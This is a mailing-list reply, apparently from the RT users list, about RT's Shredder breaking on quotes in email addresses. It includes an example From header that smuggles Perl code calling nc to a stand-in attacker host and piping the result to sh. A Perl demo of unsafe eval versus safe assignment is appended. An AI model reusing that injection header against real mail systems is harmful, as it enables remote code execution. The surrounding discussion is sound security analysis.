> Shredder doesn't like when an email address contains either a single-
> or double-quote.

An email address, or the name associated with an email address?  If it
really is broken enough to get upset when an email address includes
unbalanced quotes, it's, well, broken; "\(*&$%\""@example.com is a
perfectly good email address, as is '^#&!`|@example.com.  (Some people
have even used such addresses, and find they don't get picked up by
spammer scrapeware - a useful property for email addresses to have.)

Even if it's the associated name, I'd call that somewhat broken.  I
know someone who uses "Patrick O'Reilly" as the name portion of his
email address (not coincidentally, that's his name).

> Understandably so considering this messes with Perl and makes it look
> for a closing, matching mark.

I find that extremely disturbing, because it implies that RT is
encountering these things in contexts where its string parsing code is
kicking in.  This makes me wonder if perhaps a mail bearing a header
like

From: "; system('cat /dev/null | nc evil.cracker.example.org 12345 | sh'); 
$dummy = " <[EMAIL PROTECTED]>

would do something nasty.  (It would even be legal from an email point
of view.)

/~\ The ASCII                           der Mouse
\ / Ribbon Campaign
 X  Against HTML               [EMAIL PROTECTED]
/ \ Email!           7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B
_______________________________________________
http://lists.bestpractical.com/cgi-bin/mailman/listinfo/rt-users

Community help: http://wiki.bestpractical.com
Commercial support: [EMAIL PROTECTED]
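
The concern raised in the message above, sketched as an added example (not RT or Shredder code, and not part of the original post): a hypothetical `store_unsafe` pastes a value into Perl source and evals it, next to a `store_safe` that keeps the value as data. The sample values are constructed; the third is a harmless stand-in for hostile input that only sets a flag if it is executed.

```perl
#!/usr/bin/perl
use strict;
use warnings;

our $EVALUATED = 0;    # becomes 1 only if a header value runs as Perl code

# Constructed sample values. The last is a harmless stand-in for hostile
# input: all it does, if executed, is set the flag above.
my @samples = (
    q{Patrick O'Reilly},
    q{"\(*&$%\""@example.com},
    q{x'; $main::EVALUATED = 1; my $dummy = 'y},
);

# Anti-pattern (hypothetical): paste the value into Perl source and eval it.
# Any single quote in the value closes the string literal early, so the rest
# of the value is parsed as code.
sub store_unsafe {
    my ($value) = @_;
    my $stored = eval "my \$v = '$value'; \$v";
    return defined $stored ? "stored [$stored]" : "compile error";
}

# Data stays data: a plain assignment never re-parses the value, so quotes
# of either kind are just characters.
sub store_safe {
    my ($value) = @_;
    my $stored = $value;
    return "stored [$stored]";
}

for my $value (@samples) {
    print "input:  $value\n";

    $EVALUATED = 0;
    my $unsafe = store_unsafe($value);
    print "  unsafe: $unsafe (code executed: ", ($EVALUATED ? "yes" : "no"), ")\n";

    $EVALUATED = 0;
    my $safe = store_safe($value);
    print "  safe:   $safe (code executed: ", ($EVALUATED ? "yes" : "no"), ")\n";
}
```

A value that merely fails to parse (the unbalanced apostrophe in the first sample) and a value that executes (the third sample) are the same defect; the parse failure is the visible symptom.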

